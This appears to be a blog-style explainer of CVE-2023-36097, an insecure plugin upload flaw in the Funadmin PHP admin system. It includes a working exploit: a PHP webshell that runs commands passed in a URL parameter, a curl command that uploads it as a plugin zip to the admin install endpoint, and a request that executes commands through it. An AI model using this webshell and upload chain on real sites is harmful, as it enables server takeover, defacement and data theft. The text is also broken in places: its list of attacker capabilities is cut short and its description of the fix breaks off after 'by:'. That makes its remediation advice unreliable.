CVE-2023-36097 - How Funadmin v3.3.2 and v3.3.3 Got Hacked by Insecure Plugin Uploads

If you run a site with Funadmin, a popular open-source admin system for PHP, here’s something you *really* need to know. CVE-2023-36097 highlights a dangerous flaw in both Funadmin v3.3.2 and v3.3.3 that lets an attacker upload malicious files via the plugin install feature. Here, in plain English, is how the vulnerability works, how to exploit it, and what you need to do to stay safe.

What Is The Vulnerability?

In Funadmin, site owners can install new plugins to add features. Normally, that means uploading a safe, compressed plugin package. But due to missing checks, anyone (including attackers) can upload any file — even a script that takes over your server.

This is called Insecure File Upload.

Official CVE page:
https://nvd.nist.gov/vuln/detail/CVE-2023-36097

Funadmin's plugin installer does not properly check the file type, the file name, or the file contents when you upload a plugin. That means an attacker can upload something that isn’t really a plugin, like a PHP webshell, and run arbitrary code on your server.

Exploit Code Example

Here’s a PoC (proof of concept) showing how to upload a PHP webshell disguised as a plugin zip file.

Let's say you create a file called plugin.zip that has a PHP shell inside named shell.php.

Malicious shell.php example

<?php
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>

Now, you compress it into plugin.zip.

Then, you can POST this zip file to the Funadmin plugin endpoint. Here’s a simple curl command to do that after getting session cookies (i.e., logged in as admin):

curl -F "file=@plugin.zip" \
     -b "PHPSESSID=your-session-id-here" \
     http://your-funadmin-site.com/admin/plugin/install

If Funadmin is vulnerable, it unzips and places the PHP file into a web-accessible plugins folder.

Now, you can run a command like this

http://your-funadmin-site.com/public/plugins/shell.php?cmd=whoami

This gives the attacker direct command execution on your server — *game over*.

Why Is This Dangerous?

Insecure file upload is one of the most critical vulnerabilities. Once exploited, any attacker can:

Take over your whole site

This bug requires access to the admin panel, but it's still extremely risky due to potential credential leaks, phishing, or insider threats.

The Real Impact

Funadmin is widely used — so this CVE affects a lot of small business and personal websites. Once a single attacker finds your site running the affected versions, your site could be defaced, data stolen, or used to attack others.

How To Fix

Upgrade Funadmin to the latest version. The developers have fixed this issue in newer releases by:

Extra Reading & References

- National Vulnerability Database (NVD) — CVE-2023-36097
- Funadmin Github Repo — Issues
- OWASP: File Upload Vulnerabilities

Conclusion

CVE-2023-36097 is one of those bugs that reminds us: *easy plugin install* can mean *easy attacker access* if not designed carefully. If you use Funadmin, upgrade now and don’t take chances with your security.

Stay safe, patch often, and don’t leave the door wide open!

Timeline

Published on: 06/22/2023 15:15:00 UTC
Last modified on: 06/28/2023 07:22:00 UTC